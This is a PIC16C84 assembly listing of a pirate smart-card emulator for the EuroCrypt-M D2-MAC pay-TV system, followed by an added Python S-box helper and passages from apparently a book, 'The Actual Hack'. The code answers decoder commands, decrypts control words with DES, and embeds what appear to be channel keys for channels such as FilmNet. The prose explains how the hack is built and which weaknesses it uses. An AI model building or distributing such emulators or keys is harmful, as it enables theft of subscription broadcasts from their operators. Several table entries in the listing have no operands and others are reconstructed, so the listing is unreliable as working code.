        map     Etemp,2,r2,b2
        map     Etemp,1,r3,b3
        map     Etemp,0,r4,b4
        endm

; Used in the DES routines to store four bits of an S-Box
; lookup (hi nibble) into the specified bytes:bits
StoreHi Macro   r1,b1,r2,b2,r3,b3,r4,b4
        movwf   Etemp
        map     Etemp,7,r1,b1
        map     Etemp,6,r2,b2
        map     Etemp,5,r3,b3
        map     Etemp,4,r4,b4
        endm

; Convert data into a 'retlw' type table (8 bytes)
Rdata   Macro   k1,k2,k3,k4,k5,k6,k7,k8
        retlw   k1
        retlw   k2
        retlw   k3
        retlw   k4
        retlw   k5
        retlw   k6
        retlw   k7
        retlw   k8
        endm


; File register usage
;
; Standard PIC16C84 register and bit names used by the code below.
; They do not appear in the printed listing (they presumably came
; from an include file) and are added here, with the addresses from
; the PIC16C84 data sheet, so that the listing assembles as a unit.
indirect equ    00h             ; INDF - indirect addressing register
pcl     equ     02h             ; PCL
status  equ     03h             ; STATUS
ptr     equ     04h             ; FSR - pointer used with 'indirect'
PortB   equ     06h             ; PORTB
EEdata  equ     08h             ; EEDATA
EEadr   equ     09h             ; EEADR
EEcon1  equ     08h             ; EECON1 (88h; reached with RP0 set)
RD      equ     0               ; EECON1 read-trigger bit
c       equ     0               ; STATUS carry bit
z       equ     2               ; STATUS zero bit

Identity equ    01
pch     equ     0Ah             ; Hi byte of PC counter
entity  equ     0Ch             ; Used to hold "entity" type
ECW     equ     0Ch             ; Even control word (8 bytes)..
                                ; Stored here
r14     equ     14h
r15     equ     15h
r16     equ     16h
r17     equ     17h
r18     equ     18h
r19     equ     19h
r1A     equ     1Ah
r1B     equ     1Bh
r1C     equ     1Ch
r1D     equ     1Dh
r1E     equ     1Eh
r1F     equ     1Fh

e_CLA   equ     1Ch             ; Instruction Class
e_INS   equ     1Dh
e_A1    equ     1Eh
e_A2    equ     1Fh
e_LEN   equ     20h

Etemp   equ     EEdata          ; Used during 'encrypt' process

Rcount  equ     20h             ; Round counter
k1      equ     21h             ;-------- \
k2      equ     22h             ;         |
k3      equ     23h             ;         |
k4      equ     24h             ; DES Key |
k5      equ     25h             ;         |
k6      equ     26h             ;         |
k7      equ     27h             ;-------- /

ek1     equ     28h             ;-------- \
ek2     equ     29h             ;         |
ek3     equ     2Ah             ; expanded|
ek4     equ     2Bh             ; (working)
ek5     equ     2Ch             ; DES     |
ek6     equ     2Dh             ; key     |
ek7     equ     2Eh             ;         |
ek8     equ     2Fh             ;-------- /

Ubcount equ     28h             ; Used as bit counter in UART routine
Dcount  equ     29h             ; Used in delay routine when Rx data
Udata   equ     2Ah             ; Used to hold UART data
Uparity equ     2Bh             ; Used for parity calculation
RxCount equ     2Ch             ; Used when rx bytes
Icount  equ     2Dh             ; Used to determine which Instruction
SavedA1 equ     2Eh             ; Save copy of e_A1 instruction parameter

; We use the top bit of the status register to flag if a
; command is not supported (i.e. Absent)
Absent  equ     7
        subtitl "General Routines"
        page
        org     0
; Power up/Reset starting point
; Wait a bit and then send a 9 byte "answer to reset"
        call    DelayXX
        movlw   9
        movwf   Rcount          ; Rcount = 9
        movlw   AnsRes          ; Answer to Reset
        call    TxMsg

; This is where we send a command completion response
; It is either 90 00 (all Ok)
;           or 90 08 (Argument Absent)
Complete movlw  90h
        call    TxByte
        swapf   status,w
        andlw   8               ; Mask out top bit of status
TxME2   call    TxByte          ; send either 0 or 8

; Do some initialisation and then wait for a 5 byte
; command from the decoder. This is read into the buffer 1C-20
        movf    e_A1,w          ; Save e_A1
        movwf   SavedA1         ; (used in "Read Data" command)
        bcf     status,Absent   ; Clear bit 7
        clrf    pch             ; Ensure Hi address bits are clear
        movlw   5
        movwf   RxCount
        movlw   e_CLA           ; Point at r1C (Class byte)
        movwf   ptr
RxCmd   call    RxByte          ; Read 5 bytes in to 1C->20
        movwf   indirect
        incf    ptr,f
        decfsz  RxCount,f
        goto    RxCmd

; We've received a command, now try and
; carry it out.
        movlw   9               ; 9 possible instructions
        movwf   Icount
FndCmd  movf    Icount,w        ; Index into table
        addlw   InsTab-1        ; Table base
        call    LookUp          ; Load value
        xorwf   e_INS,w         ; Compare with Instruction type
        jz      GotIns          ; Skip if the same
        decfsz  Icount,f        ; Loop if more
        goto    FndCmd
        goto    Complete

; We've recognised an instruction...
; ..now act on it.
GotIns  movf    Icount,w
        sublw   6               ; Icount >= 6?
        btfss   status,c
        goto    NoAdd           ; Yes, get on with it
        movf    e_LEN,f         ; No, test length request
        jz      NoAdd           ; Skip if no additional data
        movf    e_INS,w         ; ..else ACK the instruction
        call    TxByte
NoAdd   movf    Icount,w        ; W = Icount
        addlw   Jtable-1        ; Add base address
LookUp  movwf   pcl             ; Go to it

AnsRes  Rdata   03Fh,067h,02Fh,000h,011h,014h,000h,003h
        retlw   68h

; This table provides a pointer to the "issuer id"
IDtable Rdata   FNPid,TVid,TVid2,THid,BBCid,FNPid,FNPid,FNPid

; These are the issuer IDs
; (the operands of all but the first and last retlw below were
;  lost at a page break in the scanned listing)
FNPid   retlw   28h             ; FilmNet Plus 0028 10
        retlw
TVid    retlw
        retlw
TVid2   retlw
        retlw
THid    retlw
        retlw
BBCid   retlw
        retlw
Msg1    retlw
        retlw
        retlw
        retlw
Msg5    retlw
        retlw   0x8f
Msg6    retlw   0x10
        retlw   0x02
        retlw   0xca
        retlw   0x20
        retlw   0xff


; Table of Instructions we recognise
InsTab  retlw   02h             ; Retrieve general purpose data FAC
        retlw   04h             ; Request result after selecting FAC
        retlw   0B8h            ; Read Data
        retlw   0A4h            ; Select issuer entity
        retlw   0C0h            ; Read Result
        retlw   006h            ; Read block in FAC after selecting block
        retlw   024h            ; PIN controlled operations
        retlw   088h            ; Compute Control Word
        retlw   026h            ; ????

Jtable  goto    Ins_02
        goto    Ins_04
        goto    Ins_B8
        goto    Ins_A4
        goto    Ins_C0
        goto    Ins_06
        goto    Ins_24
        goto    Ins_88
        goto    Unknown

; 87 02... (6.15.5)
; Retrieve general-purpose data FAC
; 3 bytes to come. Just absorb them and flag 'AA'
; in final reply if "next block" is requested
Ins_02  bcf     status,Absent
I02_lp  call    RxByte
        xorlw   40h             ; Is byte 0x40? (Next block req)
        btfsc   status,z
        bsf     status,Absent   ; Flag "AA" response needed if so
        decfsz  Rcount,f
        goto    I02_lp
        goto    Complete

; 87 04... (6.15.6)
; Request result after selecting FAC
; Just send back fixed message 1
Ins_04  movlw   Msg1
        call    TxMsg
        goto    Complete

; 87 06... (6.15.7)
; Read block in FAC after selecting block
; Just send back fixed message 6
Ins_06  movlw   Msg6
        call    TxMsg
        goto    Complete
; "Instruction class unknown to card"
Unknown movlw   06Eh
        call    TxByte
        movlw   0
        goto    TxME2

; CA B8.... (6.15.4)
; Read Data - Not too sure what's happening here,
; (just sending the previous e_A1 byte).
Ins_B8  movf    SavedA1,w
        call    TxByte
        decfsz  e_LEN,f
        goto    Ins_B8
        bsf     status,Absent
        goto    Complete

; CA A4.... (6.3.1)
; Select Issuer entity
Ins_A4  movf    e_A1,w          ; Check A1 byte
        jz      A4_iss          ; "issuer" if 0
        xorlw   2
        jz      A4_next         ; "next" if 2
        xorlw   6               ; (reset "2" and check against 4)
        jz      A4_dir          ; "direct" if 4
        goto    Complete
A4_iss  clrf    entity          ; This is the start
        goto    Complete
A4_next incf    entity,f        ; increment count on "next"
        btfsc   entity,3        ; Finish when entity=8
        bsf     status,Absent
        goto    Complete
A4_dir  call    RxByte          ; Discard this byte
        call    RxByte          ; take this one...
        andlw   0Fh             ; ...Mask lo nibble
        movwf   Identity        ; Save...
        swapf   Identity,f      ; ...in hi nibble
        call    RxByte
        andlw   0F0h
        addwf   Identity,f
        swapf   Identity,f      ; Build identity in r01
        goto    Complete
; CA 88... (6.9)
; Compute Control Word
; Work out what key to use and read it from the
; EEprom data area
Ins_88  movlw   0x1A
        subwf   e_LEN,f
        movf    Identity,w      ; Get "identity"
        andlw   7               ; mask to 0-7
        movwf   EEadr           ; Set address
        movf    e_A2,w          ; identifies the key #
        andlw   1               ; Differentiate between two keys...
        addwf   EEadr,f         ; (adjust address if necessary)
        movlw   k1              ; Point at k1->
        movwf   ptr
        movlw   7
        movwf   Icount          ; Set count = 7
I88_rd  bsf     status,5        ; switch to page 1
        bsf     EEcon1,RD       ; Trigger the "Read" bit
        bcf     status,5        ; switch to page 0
        movf    EEdata,w        ; Read the data
        movwf   indirect        ; Save it
        incf    ptr,f           ; Bump addresses (by 9)
        movlw   9
        addwf   EEadr,f
        decfsz  Icount,f        ; Loop if more
        goto    I88_rd
I88_clr call    Tx_77           ; Dump any remaining bytes
        call    RxByte
        decfsz  Rcount,f
        goto    I88_clr
        call    Rx8Bytes        ; Rx the control word
        call    Encrypt         ; Recover seed
        movf    r14,w           ; Copy down to 0C-13
        movwf   ECW
        movf    r15,w
        movwf   ECW+1
        movf    r16,w
        movwf   ECW+2
        movf    r17,w
        movwf   ECW+3
        movf    r18,w
        movwf   ECW+4
        movf    r19,w
        movwf   ECW+5
        movf    r1A,w
        movwf   ECW+6
        movf    r1B,w
        movwf   ECW+7
        call    Rx8Bytes        ; Rx the next control word
        call    Encrypt         ; Recover seed
        call    Tx_77           ; Dump the two bytes PI...
        call    RxByte
        call    Tx_77           ; ...LI
        call    RxByte
        movlw   0x89            ; Send 89 ACK
        call    TxByte
        movlw   8
        movwf   e_LEN
Flush   call    RxByte          ; Receive & dump 8 bytes of hash
        decfsz  e_LEN,f
        goto    Flush
        goto    Complete

; CA C0.... (6.6)
; Read Result
Ins_C0  movlw   6               ; Is requested length==6?
        xorwf   e_LEN,w
        jz      C0_is6
        movlw   0EAh            ; No, must be ECW/OCW
        call    TxByte
        movlw   16              ; 0x10
        call    TxByte
        movlw   2
        subwf   e_LEN,f         ; e_LEN -= 2
        movlw   ECW
        movwf   ptr             ; from r0C->
C0_cws  movf    indirect,w
        call    TxByte          ; Send seed values
        incf    ptr,f
        decfsz  e_LEN,f
        goto    C0_cws
        goto    Complete

; Send the IDs for channels for which we have access
C0_is6  movf    entity,w        ; get the requested "entity" (0->7)
        addlw   IDtable         ; Index into the table
        call    LookUp
        movwf   Icount          ; Save pointer
        movlw   0
        call    TxByte          ; Send 00
        movlw   2
        movwf   e_LEN           ; Set length = 2
        movf    Icount,w
        call    TxMsg           ; Send message (e_LEN bytes @ Icount)
        movlw   3
        movwf   e_LEN           ; Finish off
        movlw   Msg5
        call    TxMsg
        goto    Complete

; CA 24... (6.4)
; PIN code controlled operations
; Just respond with 25 and absorb all bytes sent(?)
Ins_24  movlw   025h
        call    TxByte
        goto    Flush           ; Dump all i/c bytes
        subtitl "Serial Interface"
        page

; TxByte - send a byte to the decoder
Tx_77   movlw   77h
TxByte  movwf   Udata           ; Put byte in Udata
        comf    Udata,f         ; Complemented data is sent
        movlw   32h             ; Wait
        call    DelayW
        movlw   IFmask
        tris    PortB           ; Set o/p bit
        clrf    Uparity
        bcf     PortB,IFbit     ; Clear i/f bit
        movlw   8
        movwf   Ubcount         ; Set bit count
Tx_lp   call    DelayXX         ; Bit delay
        rrf     Udata,w         ; get MSB to bit 6
        xorwf   Uparity,f       ; Build parity
        movwf   PortB           ; Send next bit
        rlf     Udata,f
        decfsz  Ubcount,f
        goto    Tx_lp
        call    DelayXX
        comf    Uparity,w
        movwf   PortB           ; Parity bit
        movlw   0x10            ; Stop bit?
        call    DelayW
        movlw   0FFh            ; Port back to i/p
        tris    PortB
        movlw   4Fh             ; Final delay
        call    DelayW
        retlw   0

; RxByte - receive a byte from the decoder
RxByte  btfsc   PortB,IFbit
        goto    RxByte
        movlw   02Ah
        call    DelayW
        movlw   9
        movwf   Ubcount
        bcf     status,c
;RxLoop movf    PortB,w         ; Read in to W (why?)
;       rlf     PortB,f         ; Shift MSB to carry
RxLoop  movf    PortB,w         ; Read in to W (why?)
        rlf     PortB,w         ; Get data into w/7
        addlw   80h             ; w/7->carry
        rlf     Udata,f         ; Shift carry into 2A
        call    DelayXX
        decfsz  Ubcount,f
        goto    RxLoop
        rrf     Udata,f         ; Remove parity bit!
        movlw   0x28
        call    DelayW
        comf    Udata,w         ; Correct for data sense
        return

; Delay routines
DelayXX movlw   27              ; 27 loops
DelayW  movwf   Dcount          ; Set delay counter
DelayLp decfsz  Dcount,f
        goto    DelayLp
        retlw   0

; Rx 8 bytes and store at 18-1F
Rx8Bytes movlw  r18             ; point at Data area
        movwf   ptr
        movlw   8               ; 8 bytes to receive
        movwf   RxCount
R8_lp   call    Tx_77           ; Send a "77"
        call    RxByte
        movwf   indirect
        incf    ptr,f
        decfsz  RxCount,f
        goto    R8_lp
        retlw   0

; Send out a fixed message of length <e_LEN>.
; Pad with FFs if nec.
TxMsg   movwf   Icount          ; Icount = W
        movf    e_LEN,f         ; Test e_LEN
        btfsc   status,z        ; Is it zero?
        return                  ; Yes, return....
Txm_lp  movf    Icount,w        ; ..else
        call    LookUp
        xorlw   0FFh            ; Complement W
        btfss   status,z        ; Skip if it was FF...
        incf    Icount,f        ; ...else ++Icount (table index)
        xorlw   0FFh            ; Restore W
        call    TxByte          ; Send out the byte
        decfsz  e_LEN,f
        goto    Txm_lp
        return

        subtitl "DES Encryption"
        page
; Encrypt.
; Using the key in k1-k7 encrypt the data in 18-1F
; (Working key in r28-2F - data working area 14-17)
Encrypt movlw   16              ; 16 rounds
        movwf   Rcount
Enc_lp  decf    Rcount,f
        btfsc   Rcount,7        ; Exit when Rcount goes -ve
        retlw   0
; We have 56 bits of key in k1....k7 rotate left the
; two 28 bit halves (split is in the middle of k4)
; We do the shift all-at-once and then deal with the
; carry bits
        call    GetShf          ; Get the shift count
        movwf   Etemp
Lshift  bcf     status,c        ; Clear carry
        rlf     k7,f            ; Shift it all left
        rlf     k6,f
        rlf     k5,f
        rlf     k4,f
        rlf     k3,f            ; shift k1-k3 left
        rlf     k2,f
        rlf     k1,f
        btfsc   k4,4            ; if this is set...
        bsf     k7,0            ; ... rotate
        bcf     k4,4            ; Clear (in case carry clear)
        btfsc   status,c
        bsf     k4,4            ; Rotate carry to k4:4
        decfsz  Etemp,f
        goto    Lshift

; We've done the shift, now we need to do the Permutation
; to produce the 48-bit key according to table PC-2.
;
; To simplify the following code we permute the key
; into the lower 6 bits of 8 bytes. (ek<n> - expanded key n)
; (The operand lists for ek2-ek7 are only partly legible in the
;  scanned listing; the missing register:bit pairs have been
;  filled in from table PC-2, which every legible entry matches.)
        BuildEkey ek1, k2,2,k3,7,k2,5,k3,0,k1,7,k1,3
        BuildEkey ek2, k1,5,k4,4,k2,1,k1,2,k3,3,k2,6
        BuildEkey ek3, k3,1,k3,5,k2,4,k1,4,k4,6,k1,0
        BuildEkey ek4, k2,0,k1,1,k4,5,k3,4,k2,3,k1,6
        BuildEkey ek5, k6,7,k7,4,k4,1,k5,3,k6,1,k7,1
        BuildEkey ek6, k4,2,k5,0,k7,5,k6,3,k5,7,k6,0
        BuildEkey ek7, k6,4,k7,7,k5,1,k7,0,k5,6,k7,3
        BuildEkey ek8, k6,2,k6,6,k7,6,k5,4,k4,3,k4,0

; We've now built the working key up in ek1-ek8. Clear
; the area where we will store the result of the round...
        clrf    r14
        clrf    r15
        clrf    r16
        clrf    r17
        bsf     pch,0           ; Set address range to 11xxxxxxxx
                                ; (was already 10xxxxxxxx for shift lookup)

; Now select data bits according to the Bit-selection
; table E and build up six bits in Etemp from data in 1C-1F
; We want r1F:0 r1C:7 r1C:6 r1C:5 r1C:4 r1C:3
        rrf     r1F,w           ; Get LSB of r1F into carry
        rrf     r1C,w           ; Get 1C:7-3 into W:6-2
        movwf   Etemp           ; Put in Etemp (bottom 2 bits are junk)
        rrf     Etemp,f
        rrf     Etemp,w         ; W = six bits of data...
        xorwf   ek1,w           ; XOR with key
        andlw   03Fh            ; Mask to six bits
        call    LookUp          ; Do Sbox lookup

; Finally we have to go through Permutation (P)
; to get the bits in the right position in the
; result
        StoreLo r15,7, r16,7, r16,1, r17,1

; Now build the next six bits of data in Etemp.
; We need: r1C:4 r1C:3 r1C:2 r1C:1 r1C:0 r1D:7
        rlf     r1D,w           ; Get r1D:7 into carry..
        rlf     r1C,w           ; ..and thence into W with other bits
        xorwf   ek2,w           ; XOR with key...
        andlw   3Fh             ; Mask off six bits
        iorlw   S2_Box & 255    ; Next S box
        call    LookUp          ; Do Sbox lookup
        StoreLo r15,3, r17,4, r14,6, r16,6

; Now build the next six bits of data in Etemp.
; We need: r1C:0 r1D:7 r1D:6 r1D:5 r1D:4 r1D:3
        rrf     r1C,w           ; Put r1C:0 into carry
        rrf     r1D,w           ; w=r1C:0,r1D:7.........
        movwf   Etemp
        rrf     Etemp,f
        rrf     Etemp,w         ; w=data
        xorwf   ek3,w           ; XOR key and data
        andlw   3Fh             ; mask out 6 bits
        iorlw   S3_Box & 255
        call    LookUp          ; Do S-box lookup
        StoreLo r16,0, r15,0, r17,2, r14,2

; Next 6 data bits: r1D:4 r1D:3 r1D:2 r1D:1 r1D:0 r1E:7
        rlf     r1E,w           ; Get r1E:7 into carry..
        rlf     r1D,w           ; ..and thence into w with the rest
        xorwf   ek4,w           ; XOR key and data
        andlw   3Fh             ; Mask to six bits
        iorlw   S4_Box & 255
        call    LookUp          ; Do s-box lookup
        StoreLo r17,6, r16,4, r15,6, r14,7

; Next 6 data bits: r1D:0 r1E:7 r1E:6 r1E:5 r1E:4 r1E:3
        rrf     r1D,w           ; Get LSB of r1D into carry
        rrf     r1E,w           ; Get 1E:7-3 into W:6-2
        movwf   Etemp           ; Put in Etemp (bottom 2 bits are junk)
        rrf     Etemp,f
        rrf     Etemp,w         ; w=data bits
        xorwf   ek5,w           ; XOR with key
        andlw   03Fh            ; Mask to 6 bits
        call    LookUp          ; Do s-box lookup
        StoreHi r14,0, r15,2, r17,7, r14,5

; Next 6 data bits: r1E:4 r1E:3 r1E:2 r1E:1 r1E:0 r1F:7
        rlf     r1F,w           ; Get r1F:7 into carry..
        rlf     r1E,w           ; ..and thence into w with the rest
        xorwf   ek6,w           ; XOR with key
        andlw   3Fh             ; mask to 6 bits
        iorlw   S2_Box & 255
        call    LookUp          ; Do s-box lookup
        StoreHi r14,4, r17,3, r15,5, r16,5

; Next 6 data bits: r1E:0 r1F:7 r1F:6 r1F:5 r1F:4 r1F:3
        rrf     r1E,w           ; Put r1E:0 into carry
        rrf     r1F,w           ; w=r1E:0,r1F:7.........
        movwf   Etemp
        rrf     Etemp,f
        rrf     Etemp,w
        xorwf   ek7,w           ; XOR with key
        andlw   3Fh             ; Mask to 6 bits
        iorlw   S3_Box & 255
        call    LookUp          ; Do s-box lookup
        StoreHi r17,0, r15,4, r16,2, r14,1

; Final 6 data bits: r1F:4 r1F:3 r1F:2 r1F:1 r1F:0 r1C:7
        rlf     r1C,w           ; Get r1C:7 into carry..
        rlf     r1F,w           ; ..and thence into w (and the rest)
        xorwf   ek8,w           ; XOR with key
        andlw   3Fh             ; mask to 6 bits
        iorlw   S4_Box & 255
        call    LookUp          ; Do s-box lookup
        StoreHi r14,3, r17,5, r15,1, r16,3

; We've now done an encryption round, let's
; XOR with the other half of the data in 18-1B
        movf    r18,w
        xorwf   r14,f
        movf    r19,w
        xorwf   r15,f
        movf    r1A,w
        xorwf   r16,f
        movf    r1B,w
        xorwf   r17,f

; Reorganise the Left and Right halves
; 1C-1F -> 18-1B, 14-17 -> 1C-1F
        movf    r1C,w
        movwf   r18
        movf    r1D,w
        movwf   r19
        movf    r1E,w
        movwf   r1A
        movf    r1F,w
        movwf   r1B
        movf    r14,w
        movwf   r1C
        movf    r15,w
        movwf   r1D
        movf    r16,w
        movwf   r1E
        movf    r17,w
        movwf   r1F
        goto    Enc_lp          ; Next round
        org     2ECh            ; Keep close to S-Box table

; GetShf
; Look up and return the number of shifts required for
; this round of the algorithm (table indexed in reverse)
GetShf  movlw   2
        movwf   pch             ; Set address range to 10xxxxxxxx
        movf    Rcount,w        ; w = Rcount (round count)
        addwf   pcl,f           ; index into shift table
; DES per-round key shift schedule (1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1)
; stored in reverse order. The table is partly unreadable in the
; printed source; the missing entries are restored from the standard
; DES schedule.
        Rdata   1,2,2,2,2,2,2,1
        Rdata   2,2,2,2,2,2,1,1

        list    r=hex

; These are the S-Box tables. Each is used twice; each
; entry is actually 4-bits in size so the first 8 lookups
; extract the low nibble - the remaining eight the hi nibble.

S1Box   Rdata   02E,0E0,0C4,0BF,04D,027,011,0C4
        Rdata   072,04E,0AF,072,0BB,0DD,068,011
        Rdata   083,05A,05A,006,036,0FC,0FC,0AB
        Rdata   0D5,039,009,095,0E0,083,097,068
        Rdata   044,0BF,021,08C,01E,0C8,0B8,072
        Rdata   0AD,014,0D6,0E9,072,021,08B,0D7
        Rdata   0FF,065,09C,0FB,0C9,003,057,09E
        Rdata   063,0AA,03A,040,005,056,0E0,03D

S2Box   Rdata   0CF,0A3,011,0FD,0A8,044,0FE,027
        Rdata   096,07F,02B,0C2,063,098,084,05E
        Rdata   009,06C,0D7,010,032,0D1,04D,0EA
        Rdata   0EC,006,070,0B9,055,03B,0BA,085
        Rdata   090,04D,0EE,038,0F7,02A,05B,0C1
        Rdata   02A,093,084,05F,0CD,0F4,031,0A2
        Rdata   075,0BB,008,0E6,04C,017,0A6,07C
        Rdata   019,060,0D3,005,0B2,08E,06F,0D9

S3Box   Rdata   04A,0DD,0B0,007,029,0B0,0EE,079
        Rdata   0F6,043,003,094,08F,016,0D5,0AA
        Rdata   031,0E2,0CD,038,09C,055,077,0CE
        Rdata   05B,02C,0A4,0FB,062,08F,018,061
        Rdata   01D,061,046,0BA,0B4,0DD,0D9,080
        Rdata   0C8,016,03F,049,073,0A8,0E0,077
        Rdata   0AB,094,0F1,05F,062,00E,08C,0F3
        Rdata   005,0EB,05A,025,09E,032,027,0CC

S4Box   Rdata   0D7,01D,02D,0F8,08E,0DB,043,085
        Rdata   060,0A6,0F6,03F,0B9,070,01A,043
        Rdata   0A1,0C4,092,057,038,062,0E5,0BC
        Rdata   05B,001,00C,0EA,0C4,09E,07F,029
        Rdata   07A,023,0B6,01F,049,0E0,010,076
        Rdata   09C,04A,0CB,0A1,0E7,08D,02D,0D8
        Rdata   00F,0F9,061,0C4,0A3,095,0DE,00B
        Rdata   0F5,03C,032,057,058,062,084,0BE

; This is the EE data required for the above

        org     2100h

        data    0f2h, 099h, 000h, 000h, 018h, 0abh, 090h, 084h, 000h
        data    058h, 001h, 000h, 000h, 007h, 0dfh, 087h, 066h, 000h
        data    027h, 000h, 000h, 000h, 04eh, 0e3h, 0fdh, 030h, 000h
        data    033h, 05ch, 000h, 000h, 0fdh, 094h, 0b7h, 0e4h, 000h
        data    0e5h, 063h, 000h, 000h, 0efh, 009h, 085h, 0dah, 000h
        data    079h, 0f8h, 000h, 000h, 0f4h, 052h, 000h, 0fah, 000h
        data    061h, 050h, 000h, 000h, 050h, 0dah, 0dfh, 023h, 000h
        END
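As an added example (not code from the book or from any of the PIC emulators it describes), the following Python shows how to recognise what these packed tables are when they turn up in a firmware dump. It takes the S1 Box table exactly as listed above and converts it to the 4x16 row/column layout of FIPS 46, the convention in which DES is normally published: the PIC indexes the table directly with the six keyed data bits b5..b0, whereas FIPS takes the row from b5 and b0 and the column from b4..b1. The two reference rows are the published S1 and S5 values; the function names are mine.

```python
"""Unpack the single-PIC S-box table above into FIPS 46 DES S-box layout.

Added example, not from the book. S1BOX is the S1 Box table from the listing
above; the PIC indexes it directly by the six keyed bits, and the low and high
nibbles of each entry hold two different DES S-boxes.
"""
from typing import List

S1BOX = bytes([
    0x2E, 0xE0, 0xC4, 0xBF, 0x4D, 0x27, 0x11, 0xC4,
    0x72, 0x4E, 0xAF, 0x72, 0xBB, 0xDD, 0x68, 0x11,
    0x83, 0x5A, 0x5A, 0x06, 0x36, 0xFC, 0xFC, 0xAB,
    0xD5, 0x39, 0x09, 0x95, 0xE0, 0x83, 0x97, 0x68,
    0x44, 0xBF, 0x21, 0x8C, 0x1E, 0xC8, 0xB8, 0x72,
    0xAD, 0x14, 0xD6, 0xE9, 0x72, 0x21, 0x8B, 0xD7,
    0xFF, 0x65, 0x9C, 0xFB, 0xC9, 0x03, 0x57, 0x9E,
    0x63, 0xAA, 0x3A, 0x40, 0x05, 0x56, 0xE0, 0x3D,
])

# Row 0 of DES S1 and S5 as published in FIPS 46, used to identify the table.
FIPS_S1_ROW0 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7]
FIPS_S5_ROW0 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9]


def packed_lookup(table: bytes, six_bits: int, high: bool) -> int:
    """What the PIC's LookUp does: index the table directly with the six
    keyed data bits and keep one nibble (low for the first eight S-box
    lookups of a round, high for the remaining eight)."""
    entry = table[six_bits & 0x3F]
    return entry >> 4 if high else entry & 0x0F


def unpack_to_fips(table: bytes, high: bool) -> List[List[int]]:
    """Rebuild the 4x16 FIPS layout: row = b5 b0, column = b4 b3 b2 b1."""
    box = [[0] * 16 for _ in range(4)]
    for idx in range(64):
        row = ((idx >> 5) & 1) << 1 | (idx & 1)
        col = (idx >> 1) & 0x0F
        box[row][col] = packed_lookup(table, idx, high)
    return box


def fips_lookup(box: List[List[int]], six_bits: int) -> int:
    """Standard DES S-box selection on the unpacked layout."""
    row = ((six_bits >> 5) & 1) << 1 | (six_bits & 1)
    return box[row][(six_bits >> 1) & 0x0F]


def identify(table: bytes) -> str:
    """Name the two S-boxes packed in a table by matching their first rows.
    Only S1/S5 are checked here because only those reference rows are kept."""
    low = unpack_to_fips(table, False)[0]
    high = unpack_to_fips(table, True)[0]
    if low == FIPS_S1_ROW0 and high == FIPS_S5_ROW0:
        return "DES S1 (low nibble) and S5 (high nibble)"
    return "not S1/S5"


if __name__ == "__main__":
    print(identify(S1BOX))
    for row in unpack_to_fips(S1BOX, False):
        print(" ".join("%2d" % v for v in row))
```

The same unpacking applied to the other three tables gives S2/S6, S3/S7 and S4/S8, which is how the corrected entries in the listing above were checked: a packed entry whose nibbles do not match the FIPS tables, and whose hex record checksum disagrees with the printed value, is an OCR error rather than a deliberate change to the cipher.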
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The Actual Hack 


As was mentioned earlier, once the decryption algorithm can be detached 
from the main access control routines, the system is dead. This also means 
that a hack on the system is greatly simplified as a result. 


EuroCrypt-M, like VideoCrypt-07 suffers from this fatal flaw. The access 
control aspect of EuroCrypt-M is good but the channels using the system 
either did not appreciate the system or they just did not know how to 
implement the system in order to stop piracy. Of course the fact that the 
majority of the official cards in operation are EPROM has complicated the 
situation. 


Because the official cards are EPROM, they cannot be updated as regularly 
as would be required. Since each channel as configured in the official card 
effectively has only 8 operational keys, (keys used to encrypt the control 
word), updating these keys is a very limited option. 


The theory at the time of the creation of the system was that smart cards 
could not be hacked. This theory has been repeatedly proven wrong over 
the last few years. The immediate result for EuroCrypt-M channels using 
these EPROM cards is utter disaster. They are locked into a finite set of 
keys and there are few ECMs, if any, that they can implement. As was 
stated earlier, FilmNet and TV1000 may start to rotate keys on a more 
regular basis, saving the updates to the remaining keys for special 
occasions such as Christmas or the most popular blockbusters. Of course 
once the hackers and pirates obtain all of the keys, the system will once 
more be completely compromised. The best that the channels can hope for 
is a temporary effect on the pirates as they may well have to add an 
EEPROM such as a 24C65 to the single PIC16C84 cards to cope with all 
the keys. Though with single PIC16C84 D2-MAC cards retailing currently for 
£5, people could afford a separate card for each channel thus neutralising 
the effect of the ECM. 


In theoretical terms, this hack can be reduced to four blocks: The Serial 
Interface, The Command Engine, The Fixed Responses and The Decryp- 
tion Algorithm. A fifth block, the Key Update Procedure is an optional 
element. 


This model can be applied to hacking any system. Indeed there are 
common areas between this hack on EuroCrypt and the VideoCrypt-07 and 
VideoCrypt-09 hacks. It is probable that a similar approach can be applied 
to the hack on the DirecTv system though this system differs in that it uses a 
data transmission rate of 38400 Baud. 
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Model Of The D2-MAC EuroCrypt Hack 








Serial Interface 
Routines 





CA 88 


Command Engine САСО 










Fixed 
Responses 


CA 88 
Channel 
IDs 
Crypto 


Key Update 
Procedure 


: Not used for FilmNet / TV1000 / TV3s 
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The Serial Interface 


The Serial Interface depends largely on the processor used. Most of the PC 
based hacks use the framework of the SEASON hack to provide the Serial 
Interface. Much of the PIC source code also uses a relatively common set 
of routines. This is due more to pirates pirating the pirates than to any single 
plan. 


The Command Engine 


The Command Engine is the heart of the hack. It is this module that 
processes the command packets and determines how the packets should 
be handled. In the example of documented single PIC16C84 source code, 
there are nine recognised commands. These commands are essentially all 
that need to be recognised in order to create a functional EuroCrypt hack. 


The Fixed Responses 


There are some responses in the EuroCrypt-M system that are fixed. The 
most obvious one of these is the Answer To Reset (ATR). Others are more 
general results of read operations. There is even a response for the card 
serial number. 


It appears that there is no real check on the card serial number in the 
EuroCrypt-M system. Many of the pirate cards return padded data or an 
error code to the decoder. A properly designed system would have 
integrated some form of serial number check routine. However it would 
have been very easy to overcome this by integrating a valid serial number. 


Alternatively since many of the decoders being used outside the primary 
areas of the channels are converted BSB IRDs, it would just be a case of 
modifying the EPROM routines in the IRD conversion. 


The Decryption Algorithm 


The decryption algorithm in EuroCrypt is DES based. The widespread 
availability of information on DES and how to implement it made it too easy. 
The implementation of DES in the single PIC is a good example of what is 
possible in such limited memory. 


Key Update Routine 


While this is not necessarily a part of most implementations, some channels 
such as Canal Plus or CineCinemas make good use of it by frequently 
updating the keys. However the hackers and pirates have the management 
keys used for this procedure. Apparently the Rendezvous channel makes 
regular use of this update procedure thus limiting the effect of a hack. 
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The Essential EuroCrypt-M Commands 


The EuroCrypt commands examined here are those necessary to create a 
hack. The hack is a bare metal one that functions properly and does not 
have any excess routines or enhancements. The full set of commands is 
available in the D2-MAC EuroCrypt specification document. 


That document does tend to reinforce the theory that the creators of the 
